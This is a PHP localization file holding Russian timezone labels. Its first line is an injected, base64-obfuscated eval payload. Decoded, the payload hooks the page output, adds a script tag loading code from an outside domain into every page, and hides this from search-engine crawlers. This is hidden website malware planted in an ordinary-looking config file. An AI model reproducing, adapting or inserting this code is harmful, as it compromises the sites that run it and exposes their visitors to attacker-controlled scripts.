<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
<?php return array(
	'timezone gmt -12' => '(GMT-12:00) Эниветок, Кваджалейн',
	'timezone gmt -11' => '(GMT-11:00) Самоа',
	'timezone gmt -10' => '(GMT-10:00) Гавайи',
	'timezone gmt -9' => '(GMT-9:00) Аляска',
	'timezone gmt -8' => '(GMT-8:00) Сев. амер. тихоокеанское время (США и Канада)',
	'timezone gmt -7' => '(GMT-7:00) Горное время (США и Канада)',
	'timezone gmt -6' => '(GMT-6:00) Центральное время (США и Канада), Мехико',
	'timezone gmt -5' => '(GMT-5:00) Сев. амер. восточное время (США и Канада), Богота, Лима, Кито',
	'timezone gmt -4.5' => '(GMT-4:30) Каракас',
	'timezone gmt -4' => '(GMT-4:00) Атлантическое время (Канада), Ла-Пас',
	'timezone gmt -3.5' => '(GMT-3:30) Ньюфаундленд',
	'timezone gmt -3' => '(GMT-3:00) Бразилиа, Буэнос-Айрес, Джорджтаун',
	'timezone gmt -2' => '(GMT-2:00) Среднеатлантическое время',
	'timezone gmt -1' => '(GMT-1:00) Азорские ост-ва, ост-ва Кабо-Верде',
	'timezone gmt 0' => '(GMT)  Лондон, Дублин, Лиссабон, Касабланка, Монровия',
	'timezone gmt +1' => '(GMT+1:00) Амстердам, Берлин, Рим, Копенгаген, Брюссель, Мадрид, Париж',
	'timezone gmt +2' => '(GMT+2:00) Афины, София, Минск, Хельсинки, Иерусалим, ЮАР',
	'timezone gmt +3' => '(GMT+3:00) Багдад, Кувейт, Рияд, Москва, Ст. Петербург',
	'timezone gmt +3.5' => '(GMT+3:30) Тегеран',
	'timezone gmt +4' => '(GMT+4:00) Абу-Даби, Маскат, Баку, Тбилиси',
	'timezone gmt +4.5' => '(GMT+4:30) Кабул',
	'timezone gmt +5' => '(GMT+5:00) Екатеринбург, Исламабад, Карачи, Ташкент',
	'timezone gmt +5.5' => '(GMT+5:30) Бомбея, Калькутты, Мадраса, Нью-Дели',
	'timezone gmt +6' => '(GMT+6:00) Алма-Аты, Дакка, Коломбо',
	'timezone gmt +7' => '(GMT+7:00) Бангкок, Ханой, Джакарта',
	'timezone gmt +8' => '(GMT+8:00) Пекин, Перт, Сингапур, Гонг Конг, Урумчи, Тайбэй',
	'timezone gmt +9' => '(GMT+9:00) Токио, Сеуле, Осака, Саппоро, Якутск',
	'timezone gmt +9.5' => '(GMT+9:30) Аделаида, Дарвин',
	'timezone gmt +10' => '(GMT+10:00) Брисбен, Канберра, Мельбурн, Сидней, Гуам, Владивосток',
	'timezone gmt +11' => '(GMT+11:00) Магадан, Соломоновы ост-ва, Новая Каледония',
	'timezone gmt +12' => '(GMT+12:00) Окленд, Веллингтон, Фиджи, Камчатка, Маршалловы ост-ва',
); ?>
